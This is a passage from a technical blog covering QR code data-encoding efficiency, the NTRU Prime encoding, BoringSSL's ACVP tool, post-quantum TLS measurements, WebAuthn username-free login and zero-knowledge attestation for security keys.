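    if not all(c in "0123456789" for c in digits):
        raise ValueError("digit mode only encodes 0-9")
    widths = {3: 10, 2: 7, 1: 4}  # digits in group -> bits used
    bits = []
    for i in range(0, len(digits), 3):
        group = digits[i:i + 3]
        width = widths[len(group)]
        bits.append(f"{int(group):0{width}b}")
    return "".join(bits)


# Two full triples (10 bits each) and a leftover pair (7 bits).
print(pack_digits("01234567"))  # 000000110001010110011000011
```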

The last segment type for these purposes is alphanumeric mode. These segments can encode A–Z, 0–9, and nine special characters: $, %, *, +, -, ., /, :, and space. Pairs of these characters are encoded in 11 bits. (If there's an odd number then the last takes 6 bits.) If you consider this to be “base-45” encoding then it stores 2×log2(45) = 10.98 bits in 11 bits of space, for 99.85% efficiency. Even better than digit mode, although only just.
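The pairing can be sketched the same way. This assumes the standard alphanumeric ordering (digits, then letters, then space and the eight punctuation characters) and that a pair is encoded as 45 times the first value plus the second; the function name is mine and only the data bits are produced.

```python
ALPHANUMERIC = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ $%*+-./:"


def pack_alphanumeric(text: str) -> str:
    """Return the data bits of a QR alphanumeric segment as a '0'/'1' string."""
    # str.index raises ValueError for characters outside the 45-symbol set.
    values = [ALPHANUMERIC.index(c) for c in text]
    bits = []
    for i in range(0, len(values) - 1, 2):
        bits.append(f"{values[i] * 45 + values[i + 1]:011b}")
    if len(values) % 2:
        bits.append(f"{values[-1]:06b}")  # odd character out takes 6 bits
    return "".join(bits)


print(pack_alphanumeric("AC-42"))  # 0011100111011100111001000010
```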

So maybe you should base-45 encode your data using that alphabet. But, of the special characters supported in alphanumeric mode, only two (minus and period) are unreserved (i.e. safe) in URLs. So you might be reduced to base-38, which cuts the efficiency to 95.42%. But having textually smaller QR contents might be valuable and worth a few percent efficiency in your context.
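The efficiency figures so far all come from the same calculation: bits of information carried by a group of characters, divided by the bits that the group costs in the QR code. A quick sketch (the helper name is mine):

```python
import math


def efficiency(base: int, chars_per_group: int, bits_per_group: int) -> float:
    """Information carried by a group of characters / bits it occupies."""
    return chars_per_group * math.log2(base) / bits_per_group


print(f"base64url in byte mode:   {efficiency(64, 1, 8):.2%}")
print(f"digits in digit mode:     {efficiency(10, 3, 10):.2%}")
print(f"base-45 in alphanumeric:  {efficiency(45, 2, 11):.2%}")
print(f"base-38 in alphanumeric:  {efficiency(38, 2, 11):.2%}")
```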

If you've picked base-10 (digits), base-38, or even base-45 for your data then you need to get it into that form. Base-64 is easy because that's exactly 6 bits per character; you work on 3 bytes of input at a time and produce exactly 4 characters of output. But 10, 38, and 45 aren't powers of two. You've got three options here. The obvious conversion would be to treat the input as a bigint and repeatedly divmod by 10 (or 38, etc) to generate the encoding. If you have a bigint library to hand then it almost certainly has the functions for that, but it's a rather obnoxious (and quadratic) amount of computation and a significant dependency. So you might be willing to waste a few bits to make things easier.
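For illustration, here is roughly what the bigint approach looks like in Python, where integers are arbitrary-precision already. The function names and the fixed-width, zero-padded framing are my own choices, not anything standard. Note that recent Python versions cap int/str conversions at 4300 digits by default, which is less than the largest QR code can hold.

```python
def digits_needed(num_bytes: int) -> int:
    """Decimal digits needed to write any value that fits in num_bytes bytes."""
    return len(str(256 ** num_bytes - 1)) if num_bytes else 0


def encode_bigint(data: bytes) -> str:
    """Treat the whole input as one little-endian integer and print it."""
    if not data:
        return ""
    value = int.from_bytes(data, "little")
    # Zero-pad so that the digit count alone determines the byte count.
    return str(value).zfill(digits_needed(len(data)))


def decode_bigint(digits: str) -> bytes:
    if not digits:
        return b""
    num_bytes = 0
    while digits_needed(num_bytes) < len(digits):
        num_bytes += 1
    if digits_needed(num_bytes) != len(digits):
        raise ValueError("not a valid encoding length")
    return int(digits).to_bytes(num_bytes, "little")
```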

The next option is an encoding noted by djb that achieves similar efficiency but with less computation and no long-division. I updated this post to include it, so it's covered in a section below.

The third option is to chunk the input and convert each chunk independently. Ideal input chunks would be 8 bytes or fewer, because nearly all environments will support a uint64 type and nearly all hardware can do a divmod on them. If you're using base-10 then there's going to be a function that can “print” a uint64 to digits for you, so let's take digits as an example. With a chunk size of two bytes you would get five digits. Each digit takes 3⅓ bits of space, so 16 input bits takes 16⅔ bits: 96% efficient. Less than the 99.66% we can get with digits for sure. But if you consider all chunk sizes from one to eight bytes, turning 7-byte chunks into 17 digits is 98.82% efficient. That's pretty good for the complexity savings.

For base-38, 7-byte chunks are the best again, producing 11 characters for 92.56% efficiency. For base-45, two-byte chunks produce 3 characters for 96.97% efficiency. (Four- and eight-byte chunks do the same if you want fewer loop iterations.)
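Those chunk sizes can be found by brute force. The sketch below tries every chunk size from one to eight bytes, works out how many characters are needed to cover the chunk's range, and charges each character its average cost in the relevant segment type (10/3 bits for digits, 11/2 bits for alphanumeric). The names are mine; ties go to the smallest chunk size.

```python
from fractions import Fraction

DIGIT = Fraction(10, 3)  # digit mode: 3 characters per 10 bits
ALNUM = Fraction(11, 2)  # alphanumeric mode: 2 characters per 11 bits


def chars_for_chunk(base: int, chunk_bytes: int) -> int:
    """Fewest base-`base` characters that can represent any chunk value."""
    chars = 1
    while base ** chars < 256 ** chunk_bytes:
        chars += 1
    return chars


def best_chunk(base: int, bits_per_char: Fraction):
    """Return (chunk_bytes, chars, efficiency) for the best 1-8 byte chunk."""
    options = []
    for n in range(1, 9):
        chars = chars_for_chunk(base, n)
        options.append((Fraction(8 * n) / (chars * bits_per_char), n, chars))
    eff, n, chars = max(options, key=lambda o: o[0])
    return n, chars, float(eff)


for base, cost in ((10, DIGIT), (38, ALNUM), (45, ALNUM)):
    n, chars, eff = best_chunk(base, cost)
    print(f"base-{base}: {n}-byte chunks -> {chars} characters, {eff:.2%}")
```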

(And you should use little-endian chunks because little-endian has won, even if the IETF hasn't caught up to that yet.)

Now you've got your payload encoding sorted … probably. A wrinkle is that it's difficult to know how your QR encoder will segment what you give it. You might have crafted a wonderful base-38 input and it might stuff it all into a byte-mode segment! (65.60% efficient, worse than base64url.) I'm sadly not aware of a good QR “debugger” that shows all the details of a QR code. ZXing's online service will give a hex-dump of the raw contents, but that assumes that you can decode the segment headers. (QR-Logo promises better debugging output but doesn't work for me.) My best advice is to use ZXing on a sample QR code, ignore the 0xec, 0x11 padding pattern at the end, and calculate whether the number of bytes used roughly makes sense.

You probably want to put a URL-like prefix at the front to make your QR codes distinguishable. One thing to consider is that “https://www.example.com/” is a byte-mode segment that takes 204 bits, but “HTTPS://WWW.EXAMPLE.COM/” is alphanumeric and needs only 145 bits. (That's assuming QR versions 1 through 9, the lengths are slightly different otherwise.) DNS names are case insensitive and “an implementation should accept uppercase letters” for the scheme says RFC 3986. Maybe it just looks odd and that's not worth the bits, though?
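Those bit counts can be reproduced with a little arithmetic: a 4-bit mode indicator, a character-count field whose width depends on the mode, and then the data bits. This sketch hard-codes the count widths for QR versions 1 through 9; the function name is mine.

```python
MODE_BITS = 4
# Width of the character-count field for QR versions 1 through 9.
COUNT_BITS = {"digit": 10, "alphanumeric": 9, "byte": 8}


def segment_bits(mode: str, length: int) -> int:
    """Total bits used by one segment holding `length` characters."""
    if mode == "byte":
        data = 8 * length
    elif mode == "alphanumeric":
        data = 11 * (length // 2) + 6 * (length % 2)
    elif mode == "digit":
        data = 10 * (length // 3) + (0, 4, 7)[length % 3]
    else:
        raise ValueError("unknown mode")
    return MODE_BITS + COUNT_BITS[mode] + data


prefix = "https://www.example.com/"
print(segment_bits("byte", len(prefix)))          # 204
print(segment_bits("alphanumeric", len(prefix)))  # 145
```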

We'll finish up with a quick look at an example, which is the thing that started me on this path in the first place: SMART Health Cards. (Thank you to the person who pointed me at them, who likely wants to remain anonymous.)

SHCs are trying to squeeze a lot of data into a QR code: they minify their JSON structure and compress it but, even then, they sometimes span multiple QR codes and the user has to scan them all. As such their contents are a) a binary segment containing “shc:/” (and maybe sequence numbers if using multiple QR codes), and then b) a digits segment containing the payload. So they didn't use “SHC:/” to save bits, but the difference is small.

One thing to note is that the QR spec (ISO/IEC 18004:2005) has a whole section on “structured append” mode, where multiple QR codes can be combined into one. But trying that with iOS and Android shows that neither supports it, so probably it can be considered dead and that's why SHC is replicating the same feature at a higher level.

Another thing to note is that SHC is using digits for better efficiency, which is great, but the way that they do it is not. They're using JWT, which is bad but not today's topic, so they have three base64-encoded strings. They then take each base64 character, subtract 45, and turn that into two base-10 digits! All that work minifying JSON and compressing it, and then they throw away 10% of their bits on such a trivial thing!
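To make the cost concrete, here is a sketch of that transformation as described above (the function name is mine). Each base64url character carries 6 bits but becomes two digits, which cost 20/3 bits in a digit segment, so the result is 90% efficient.

```python
from fractions import Fraction


def shc_digits(token: str) -> str:
    """Map each character to (code point - 45) written as two decimal digits."""
    return "".join(f"{ord(c) - 45:02d}" for c in token)


# The start of a typical base64url-encoded JSON header.
print(shc_digits("eyJ"))  # 567629

bits_of_information = 6                 # per base64url character
bits_in_qr_code = 2 * Fraction(10, 3)   # two digits in digit mode
print(float(bits_of_information / bits_in_qr_code))  # 0.9
```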

So SHC did pretty well, but missed an easy win. Having read this, you can do better.

The NTRU Prime encoding

Above, I referenced an encoding that gets nearly all the space efficiency of the bigint-and-divmod method, but without the computational costs. This section is about that. It's taken from page 18 of the NTRU Prime NIST submission.

Our motivating issue is thus: if you have a whole byte then taking it mod 10 to generate a digit works fairly well. The digits 0–5 have probability 26/256 while 6–9 have probability 25/256. That's not uniform, and therefore it doesn't encode the maximum amount of entropy, but it's 99.992% efficient, which is pretty good. But when you have a smaller range of input values the non-uniformity becomes significant and so does the reduction in information transmitted.
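That efficiency figure is the entropy of the resulting digit divided by the log2(10) bits that a perfectly uniform digit would carry. A small sketch to check it, assuming the input value is uniform over its range (the function name is mine):

```python
import math
from collections import Counter


def mod_digit_efficiency(range_size: int, base: int = 10) -> float:
    """Entropy of (uniform value in range(range_size)) % base, over log2(base)."""
    counts = Counter(v % base for v in range(range_size))
    entropy = -sum(
        (c / range_size) * math.log2(c / range_size) for c in counts.values()
    )
    return entropy / math.log2(base)


print(f"{mod_digit_efficiency(256):.3%}")  # a whole byte: 99.992%
print(f"{mod_digit_efficiency(16):.3%}")   # only 4 bits of input: noticeably worse
```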

The encoding in NTRU Prime takes input values (which can be larger than bytes) and combines pairs of them. It produces some output values from each pair but, once the non-uniformity gets uncomfortable, it pairs up the leftovers to increase the range. This repeats in a binary-tree.

As a concrete example we'll use the Python code from page 18 and set M = [256…] (because our inputs are bytes), change the 256 and 255 to 10 and 9 (to extract digits, not bytes), and set limit to 1024. Our example input will be 419dd0ed371f44b7.

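Input bytes: 65 157 208 237 55 31 68 183

First level (pairs of input bytes):
40257 → 7,5 leaving 402/656
60880 → 0,8 leaving 608/656
7991 → 1,9 leaving 79/656
46916 → 6,1 leaving 469/656

Second level (pairs of leftovers):
399250 → 0,5,2 leaving 399/431
307743 → 3,4,7 leaving 307/431

Third level (value taken mod 431×431 = 185761):
132716 → 6,1,7 leaving 132/186

Final leftover:
132/186 → 2,3,1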

The input bytes are written (in base 10) along the top. Pairs of them are combined. Take the first pair, 65 and 157: its value is 157×256 + 65 = 40257. That can be considered to be 40257 mod 65536 and, since there's a reasonable number of bits in there, two digits are extracted. Obviously 40257 mod 10 = 7, and 4025 mod 10 = 5. So the two digits are 7 and 5. That leaves 402 mod 656, and 656 is below the limit of 1024 that we set, so it's passed down to be combined into the box below. This continues down the tree: each time there's too little data left to extract another digit, the leftovers are passed down to be combined. At the bottom there's nothing else to combine with so the final leftover value, 132 mod 186, is converted into the digits 2, 3, and 1. The ultimate output digits are concatenated from left-to-right, top-to-bottom.

This achieves good encoding efficiency without repeated long-division, and can be parallelised.
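For reference, here is a sketch of the encoder with the modifications described above already applied: output symbols are digits rather than bytes and the limit is 1024. It is my adaptation of the structure of the submission's Python code, so treat the submission itself as authoritative; the constant names are mine.

```python
LIMIT = 1024  # stop extracting digits once the modulus drops below this
BASE = 10     # output symbols are decimal digits


def encode(R, M):
    """R[i] is a value in range(M[i]); returns a list of base-10 digits."""
    if not M:
        return []
    out = []
    if len(M) == 1:
        # Nothing left to pair with: flush the final value completely.
        r, m = R[0], M[0]
        while m > 1:
            out.append(r % BASE)
            r, m = r // BASE, (m + BASE - 1) // BASE
        return out
    R2, M2 = [], []
    for i in range(0, len(M) - 1, 2):
        # Combine a pair, then peel off digits while the range is large.
        m, r = M[i] * M[i + 1], R[i] + M[i] * R[i + 1]
        while m >= LIMIT:
            out.append(r % BASE)
            r, m = r // BASE, (m + BASE - 1) // BASE
        R2.append(r)
        M2.append(m)
    if len(M) & 1:
        # An unpaired value is passed down unchanged.
        R2.append(R[-1])
        M2.append(M[-1])
    return out + encode(R2, M2)


data = bytes.fromhex("419dd0ed371f44b7")
digits = encode(list(data), [256] * len(data))
print("".join(map(str, digits)))  # 75081961052347617231
```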

ACVP

If you do not know what ACVP is then you should read no further. If you think it might be useful then what you're actually looking for is Wycheproof; ACVP is only for those who have no choice.

If you're still reading and you're vaguely aware that your previous CAVP infrastructure isn't applicable any longer, and that you'll need to deal with ACVP next time, then you might be interested in BoringSSL's ACVP infrastructure. We have a number of different FIPS modules to test and wanted something generic rather than repeating the bespoke-per-module way that we handled CAVP. We also need to test not just BoringCrypto (a software module) but also embedded devices.

The result, acvptool, lives within the BoringSSL repo and can translate ACVP JSON into a series of reasonably simple IPC calls that a “module wrapper” speaks over stdin/stdout. BoringSSL's module wrapper is the reference implementation, but there's also a tiny one for testing that could easily be repurposed to forward over a serial link, etc, for embedded devices.

It's reasonably likely that you'll find some case that's not handled, but the code is just Go throwing around JSON so you should be able to extend it without too much bother. But, for the cases that are already handled, the weird undocumented quirks that'll otherwise consume hours of your life are taken care of.

Letter to 20 years ago

I noticed that I have not posted anything here in 2020! There's a bunch of reasons for this: the work I'm doing at the moment does not lend itself so well to blog posts, and life intervenes, leaving less time for personal projects. But in order to head off the risk that I'll post nothing at all this year I pulled something from one of my notebooks. 2020 is a round number so I decided to do some reflection and this was a letter that I imagined writing to myself 20 years ago. It is very much a letter to me! The topics are going to be quite specific and if you weren't paying attention to the computing industry in the year 2000 I’m not sure how much of it will make sense. But these are the points that I think me of 20 years ago would have wondered about.

You must be thinking that computers will be crazy fast by now. Yes…ish. It's complicated, and that's going to be a theme here. You've been hearing from Intel that the NetBurst chips will hit 10GHz in a few years, so with another few doublings what will we have by now? 50GHz? Actually common values are around 3.5GHz. Some reach 5GHz, but only in bursts. Intel never hit 10GHz and nor did anybody else. It’s better than it sounds: instructions per clock are up a lot, so each cycle is worth more. (Although maybe we'll get to some of the issues that caused!) More importantly, all systems are multiprocessor now. It's physically a single chip, but inside is often 8- to 32-way SMT. Yep, that's cool. And yep, it only helps for certain sorts of workloads. Multithreaded programming is not going away.

Memory? 10s of gigabytes is common. Hard drives? It's nearly all flash now. You can still buy hard drives and they’re huge and cheap, but the speed of flash is pretty sweet. Computers really are quite substantially faster — don't be too put off by the clock speeds.

Your day-to-day life is a bunch of xterms and a web browser. Nothing's changed; you are dramatically underestimating the importance of path dependence. Terminals are still emulating a fancy VT-100 and sometimes they get messed up and need a reset. No fixes there. It's still bash or zsh; nearly unchanged from your time. The kernel has been fixed a little: you can now get a handle to a process, so no more PID races. You can open a file relative to a directory descriptor and you can create an unlinked file in a directory and link it later. Yes it's good that these things are possible now, but it is not a fundamental change and it took a long time. Actually you know what? Windows grew a much smarter shell, leapfrogging Linux in several respects. They had hardly moved forward since DOS so it was easier there, perversely.

So innovation must have happened higher up where there was new ground and little legacy, right? What about the semantic web? How did that turn out? Not well. We don't have lots of data in machine-readable formats and fancy GUIs so that anyone can create automation. Information is somewhere between impossible and a huge pain to access. You’ve read The Dilbert Future by now and its ‘confusopoly’ concept is much closer to the mark. The Semantic Web stuff failed so badly that nobody even tries any longer. (I'm afraid Scott Adams won’t seem so wholesome in the future either.) The closest you'll get is that your web browser can fill out your name, address, and credit card details. And it has to work really hard to do that because there’s almost no assistance from web pages. Go find Weaving the Web and throw it away.

Something more positive: bandwidth! You are using a dial-up that tops out at 5 KB/s and charges by the minute. You use a local proxy that keeps a copy of everything so that viewed pages are available offline and it lets you mark missing pages for batch fetching to reduce the cost. This problem is now solved. You can assume that any house in a city can get an always-on, several 10s of Mb/s connection. It's not as cheap as it could be but it's a standard household expense now. (Note: past me doesn't live in the US! —agl.) Also, everyone carries an impossibly fancy PDA that has that level of connection wirelessly and everywhere. I don't need to equivocate here, connectivity is solved in the sorts of places you're likely to live. But … there's a second edge to that sword. This connectivity can be a bit … much? There are some advantages to having the internet be stationary, metered, and behind 30 seconds of banshee wailing and static. Imagine your whole social life getting run through IRC, and that you're always connected. It’s tough to explain but there's a problem. But these PDAs? They have GPS and maps. Nobody gets lost anymore. Nobody carries paper street maps in their car. Connectivity can be pretty sweet.

This next bit is going to upset you a little: the whole Palladium / trusted boot stuff never took off on the desktop, but these PDAs are pretty locked down. One type of them is completely locked down and you can’t run non-approved software. The other will make you jump through hoops and, even then, you can't access the data of other programs. On the latter sort you can install a completely custom OS most of the time, but there's attestation and some things won't cooperate. This is still playing out and people are fighting over the details (because of money, of course). It remains a concern, but you underestimate the benefits of this sort of system. Your idea that people should own their own computers because they’re critical tools isn't wrong, but it is elitist. For the vast majority of people, their desktops degrade into a fragile truce with a whole ecosystem of malware and near-malware. Maybe it's their “fault” for having installed it, but these PDAs are so popular, in part, because they're hard to screw up. Bad stuff does get through the approval process, but it cannot mess things up to the wipe-and-reinstall level that desktops reach. The jury is still out about whether we will regret this, but you're wrong about the viability of giving people Windows XP and getting a good result.

Back on a positive note: the music industry switched to a $15 a month stream-whatever-you-want model and it works fine. You were completely right about this. Music still exists and it still pays a few at the top large sums and the rest very little. The music industry itself didn't sort this out though, other companies did it for them. What you're missing is that you’re not taking things far enough: companies also did this for TV and (many) movies. There are still rips of this stuff on BitTorrent, but it's not a live issue because people pay the subscription for the ease, by and large. In fact, access to scientific papers is a hotter issue now!

Basically, rates of change are really uneven.

Real-world measurements of structured-lattices and supersingular isogenies in TLS

This is the third in a series of posts about running experiments on post-quantum confidentiality in TLS. The first detailed experiments that measured the estimated network overhead of three families of post-quantum key exchanges. The second detailed the choices behind a specific structured-lattice scheme. This one gives details of a full, end-to-end measurement of that scheme and a supersingular isogeny scheme, SIKE/p434. This was done in collaboration with Cloudflare, who integrated Microsoft's SIKE code into BoringSSL for the tests, and ran the server-side of the experiment.

Setup

Google Chrome installs, on Dev and Canary channels, and on all platforms except iOS, were randomly assigned to one of three groups: control (30%), CECPQ2 (30%), or CECPQ2b (30%). (A random ten percent of installs did not take part in the experiment so the numbers only add up to 90.) CECPQ2 is the hybrid X25519+structured-lattice scheme previously described. CECPQ2b is the name that we gave to the combination of X25519 and the SIKE/p434 scheme.

Because optimised assembly implementations are labour-intensive to write, they were only available/written for AArch64 and x86-64. Because SIKE is computationally expensive, it wasn’t feasible to enable it without an assembly implementation, thus only AArch64 and x86-64 clients were included in the experiment and ARMv7 and x86 clients did not contribute to the results even if they were assigned to one of the experiment groups.

Cloudflare servers were updated to include support for both CECPQ2 and CECPQ2b, and to support an empty TLS extension that indicated that they were part of the experiment. Depending on the experiment group, Chrome would either offer CECPQ2, CECPQ2b, or just non-post-quantum options, in its TLS 1.3 handshake, along with the signaling extension to indicate which clients were part of the control group. Measurements were taken of how long TLS handshakes took to complete using Chrome’s metrics system. Chrome knew which servers were part of the experiment because they echoed the signaling extension, thus all three groups were measuring handshake duration against the same set of servers.

After this phase of the trial was complete, client-side measurements were disabled and Chrome Canary was switched to a mode where it randomly picked one of CECPQ2, CECPQ2b, or neither to offer. This enabled some additional, server-side measurements to ensure that nothing unexpected was occurring.

(Cloudflare has a significantly more detailed write up of this experiment.)

Biases

We’re aware of a couple of biases and these need to be kept in mind when looking at the results. Firstly, since ARMv7 and x86 platforms were excluded, the population was significantly biased towards more powerful CPUs. This will make supersingular isogenies look better. Also, we’ve seen from past experiments that Canary and Dev Chrome users tend to have worse networks than the Chrome user population as a whole, and this too will tend to advantage supersingular isogenies since they require less network traffic.

Results

Here are histograms of client-side results, first from Windows (representing desktops/laptops) and then from Android (representing mobile devices):

[Figure: two histograms of TLS handshake time in milliseconds (log scale, 1 to 10000), “TLS handshake latency (Windows)” and “TLS handshake latency (Android)”, each comparing the Control, CECPQ2, and CECPQ2b groups.]

From the histograms we can see that the CECPQ2b (SIKE) group shifts visibly to the right (i.e. slower) in both cases. (On Android, a similar but smaller shift is seen for CECPQ2.) Despite the advantages of removing the slower clients and experimenting with worse-than-usual networks, the computational demands of SIKE outweigh the reduced network traffic. Only for the slowest 5% of connections are the smaller messages of SIKE a net advantage.

Cloudflare have a much more detailed analysis of the server-side results, which are very similar.

Conclusion

While there may be cases where the smaller messages of SIKE are a decisive advantage, that doesn’t appear to be the case for TLS, where the computational advantages of structured lattices make them a more attractive choice for post-quantum confidentiality.

Username (and password) free login with security keys

Most readers of this blog will be familiar with the traditional security key user experience: you register a token with a site then, when logging in, you enter a username and password as normal but are also required to press a security key in order for it to sign a challenge from the website. This is an effective defense against phishing, phone number takeover, etc. But modern security keys are capable of serving the roles of username and password too, so the user experience can just involve clicking a login button, pressing the security key, and (perhaps) entering a locally-validated PIN if the security key doesn't do biometrics. This is possible with the recently released Chromium 76 and also with Edge or Firefox on current versions of Windows.

On the plus side, this one-button flow frees users from having to remember and type their username and password for a given site. It also avoids sites having to receive and validate a password, potentially avoiding both having a password database (which, even with aggressively slow hashes, will leak many users' passwords if disclosed), and removing any possibility of accidentally logging the plaintext values (which both Google and Facebook have done recently). On the negative side, users will need a modern security key (or Windows Hello-enabled computer) and may still need to enter a PIN.

Which security keys count as “modern”? For most people it'll mean a series-5 black Yubikey or else a blue Yubikey that has a faint “2” printed on the upper side. Of course, there are other manufacturers who make security keys and, if it advertises “CTAP2” support, there's a good chance that it'll work too. But those Yubikeys certainly do.

In practical terms, web sites exercise this capability via WebAuthn, the same API that handles the traditional security key flow. (I'm not going to go into much detail about how to use WebAuthn. Readers wanting more introductory information can see what I've written previously or else see one of the several tutorials that come up in a Google search.)

When registering a security key for a username-free login, the important differences are that you need to make requireResidentKey true, set userVerification to required, and set a meaningful user ID.
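As a sketch of what that looks like from the server's side, here is one way to build the creation options that a page would pass to navigator.credentials.create(). The relying party name, the ES256 algorithm choice, and the base64url transport of binary fields (which the page must decode back into buffers) are all assumptions for illustration, as is the function name.

```python
import base64
import json
import secrets


def b64url(data: bytes) -> str:
    """Unpadded base64url, a common way to carry bytes inside JSON."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def registration_options(user_id: bytes, name: str, display_name: str) -> dict:
    return {
        "rp": {"name": "Example Site"},  # hypothetical relying party
        "user": {
            "id": b64url(user_id),       # opaque, non-identifying user ID
            "name": name,
            "displayName": display_name,
        },
        "challenge": b64url(secrets.token_bytes(32)),
        "pubKeyCredParams": [{"type": "public-key", "alg": -7}],  # ES256
        "authenticatorSelection": {
            "requireResidentKey": True,      # discoverable without its ID
            "userVerification": "required",  # PIN or biometric
        },
    }


options = registration_options(secrets.token_bytes(16), "alice", "Alice Example")
print(json.dumps(options, indent=2))
```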

In WebAuthn terms, a “resident” credential is one that can be discovered without knowing its ID. Generally, most security keys operate statelessly, i.e. the credential ID is an encrypted private seed, and the security key doesn't store any per-credential information itself. Thus the credential ID is required for the security key to function so the server sends a list of them to the browser during login, implying that the server already knows which user is logging in. Resident keys, on the other hand, require some state to be kept by the security key because they can be used without presenting their ID first. (Note that, while resident keys require some state to be kept, security keys are free to keep state for non-resident keys too: resident vs non-resident is all about whether the credential ID is needed.)

User verification is about whether the security key is providing one or two authentication factors. With the traditional experience, the security key is something you have and the password is something you know. In order to get rid of the password, the security key now needs to provide two factors all by itself. It's still something you have so the second security key factor becomes a PIN (something you know) or a biometric (something you are). That begs the question: what's the difference between a PIN and a password? On the surface: nothing. A security key PIN is an arbitrary string, not limited to numbers. (I think it was probably considered too embarrassing to call it a password since FIDO's slogan is “solving the world's password problem”.) So you should think of it as a password, but it is a password with some deeper advantages: firstly, it doesn't get sent to web sites, so they can't leak it and people can safely use a single password everywhere. Secondly, brute-force resistance is enforced by the hardware of the security key, which will only allow eight attempts before locking and requiring a reset. Still, it'll be nice when biometrics are common in security keys.

A user ID is an opaque identifier that should not be personally identifying. Most systems will have some database primary key that identifies a user and, if using that as a WebAuthn user ID, ensure that you encrypt it first with a key that is only used for this purpose. That way it doesn't matter if those primary keys surface elsewhere too. Security keys will only store a single credential for a given pair of domain name and user ID. So, if you register a second credential with the same user ID on the same domain, it'll overwrite the first.

The fact that you can register more than one credential for a given domain means that it's important to set the metadata correctly when creating a resident credential. This isn't unique to resident keys, but it's much more important in this context. The user name and displayName will be shown by the browser during login when there's more than one credential for a domain. Also the relying party name and displayName will be shown in interfaces for managing the contents of a security key.

When logging in, WebAuthn works as normal except you leave the list of credential IDs empty and set userVerification to required. That triggers the resident-credential flow and the resulting credential will include the user ID, with which you look up the user and their set of registered public keys, and then validate the public key and other parameters.
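The login side can be sketched similarly. The options below are what a page would pass to navigator.credentials.get(); the in-memory store, its placeholder contents, and the function names are hypothetical, and the signature check itself is left out.

```python
import base64
import secrets


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def login_options() -> dict:
    return {
        "challenge": b64url(secrets.token_bytes(32)),
        "allowCredentials": [],          # empty: no credential IDs are sent
        "userVerification": "required",
    }


# Hypothetical store: user ID -> {credential ID -> public key bytes}.
USERS = {b"opaque-user-id": {b"cred-A": b"<public key A>"}}


def public_key_for(user_handle: bytes, credential_id: bytes) -> bytes:
    """Find the key that the assertion's signature must verify against."""
    credentials = USERS.get(user_handle)
    if credentials is None or credential_id not in credentials:
        raise LookupError("unknown user or credential")
    return credentials[credential_id]
```

The user ID returned in the assertion selects the account, and the credential ID then selects which of that account's registered public keys to check the signature with.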

Microsoft have a good test site (enter any username) where you can experiment with crafting different WebAuthn requests.

Exposed credentials

In order to support the above, security keys obviously have a command that says “what credentials do you have for domain x?”. But what level of authentication is needed to run that command is a little complex. While it doesn't matter for the web, one might want to use security keys to act as, for example, door access badges; especially over NFC. In that case one probably doesn't want to bother with a PIN etc. Thus the pertinent resident credentials would have to be discoverable and exercisable given only physical presence. But in a web context, perhaps you don't want your security key to indicate that it has a credential stored for cia.gov (or mss.gov.cn) to anyone who can plug it in. Current security keys, however, will disclose whether they have a resident credential for a given domain, and the user ID and public key for that credential, to anyone with physical access. (Which is one reason why user IDs should not be identifying.) Future security keys will have a concept of a per-credential protection level which will prevent them from being disclosed without user verification (i.e. PIN or biometrics), or without knowing their random credential ID. While Chromium will configure credential protection automatically if supported, other browsers may not. Thus it doesn't hurt to set credProtect: 2 in the extensions dictionary during registration.

Zero-knowledge attestation

U2F/FIDO tokens (a.k.a. “Security Keys”) are a solid contender for doing something about the effectiveness of phishing and so I believe they're pretty important. I've written a fairly lengthy introduction to them previously and, as mentioned there, one concerning aspect of their design is that they permit attestation: when registering a key it's possible for a site to learn a cryptographically authenticated make, model, and batch. As a browser vendor who has dealt with User-Agent sniffing, and as a large-site operator, who has dealt with certificate pervasiveness issues, that's quite concerning for public sites.

It's already the case that one significant financial site has enforced a single-vendor policy using attestation (i.e. you can only register a token made by that vendor). That does not feel very congruent with the web, where any implementation that follows the standards is supposed to be a first-class citizen. (Sure, we may have undermined that with staggering levels of complexity, but that doesn't discredit the worth of the goal itself.)

Even in cases where a site's intended policy is more reasonable (say, they want to permit all tokens with some baseline competence), there are strong grounds for suspecting that things won't turn out well. Firstly, the policies of any two sites may not completely align, leading to a crappy user experience where a user needs multiple tokens to cover all the sites that they use, and also has to remember which works where. Secondly, sites have historically not been so hot about staying up-to-date. New token vendors may find themselves excluded from the market because it's not feasible to get every site to update their attestation whitelists. That feels similar to past issues with User-Agent headers but the solution there was to spoof other browsers. Since attestation involves a cryptographic signature, that answer doesn't work here.

So the strong recommendation for public sites is not to request attestation and not to worry about it. The user, after all, has control of the browser once logged in, so it's not terribly clear what threats it would address.

However, if we assume that certain classes of sites probably are going to use attestation, then users have a collective interest in those sites enforcing the same, transparent standard, and in them keeping their attestation metadata current. But without any impetus towards those ends, that's not going to happen. Which raises the question: can browsers do something about that?

Ultimately, in such a world, sites only operate on a single bit of information about any registration: was this public-key generated in a certified device or not? The FIDO Alliance wants to run the certification process, so then the problem reduces down to providing that bit to the site. Maybe they would simply trust the browser to send it: the browser could keep a current copy of the attestation metadata and tell the site whether the device is certified or not. I don't present that as a straw-man: if the site's aim is just to ensure that the vast majority of users aren't using some backdoored token that came out of a box of breakfast cereal then it might work, and it's certainly simple for the site.

But that would be a short blog post, and I suspect that trusting the browser probably wouldn't fly in some cases.

So what we're looking for is something like a group signature scheme, but we can't change existing tokens. So we need to retrospectively impose a group signature on top of signers that are using vanilla P-256 ECDSA.

Zero-knowledge proofs

It is a surprising but true result in cryptography that it's possible to create a convincing proof of any statement in NP that discloses nothing except the truth of the statement. As an example of such a statement, we might consider “I know a valid signature of message x from one of the public keys in this set”. That's a pretty dense couple of sentences but rather than write an introduction to zero-knowledge proofs here, I'm going to refer you to Matthew Green's posts[1][2]. He does a better job than I would.

I obviously didn't pick that example at random. If there was a well-known set of acceptable public keys (say, as approved by the FIDO Alliance) then a browser could produce a zero-knowledge proof that it knew a valid attestation signature from one of those keys, without disclosing anything else, notably without disclosing which public key was used. That could serve as an “attestation valid” bit, as hypothesised above, that doesn't require trusting the browser.

As a concrete instantiation of zero-knowledge proofs for this task, I'll be using Bulletproofs [BBBPWM17]. (See zkp.science for a good collection of many different ZK systems. Also, dalek-cryptography have excellent notes on Bulletproofs; Cathie Yun and Henry de Valence from that group were kind enough to help me with a question about Bulletproofs too.)

